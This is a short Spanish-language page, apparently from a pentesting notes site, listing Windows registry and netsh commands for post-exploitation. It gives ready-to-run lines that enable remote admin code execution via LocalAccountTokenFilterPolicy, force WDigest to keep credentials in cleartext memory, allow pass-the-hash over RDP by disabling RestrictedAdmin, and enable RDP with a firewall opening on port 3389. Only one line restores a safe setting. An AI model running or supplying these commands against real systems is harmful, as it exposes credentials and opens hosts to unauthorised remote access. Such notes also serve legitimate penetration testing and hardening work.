search

Edicion de Registros

hashtag
Ejecucion Remota de Codigo para los usuarios Administradores:

cmd /c reg add HKLM\SOFTWARE\MICROSOFT\WINDOWS\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

hashtag
Almacenamiento de Credenciales en memoria (cifradas o en texto claro) cambiar a texto claro:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

Hacerlo seguro:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0

hashtag
Pass The Hash por RDP

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

hashtag
Habilitar RDP

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

seguido de:

netsh firewall add portopening TCP 3389 "Remote Desktop"

PreviousDiferentes Accesos y Cambios de RegistrosNextAccesos

Last updated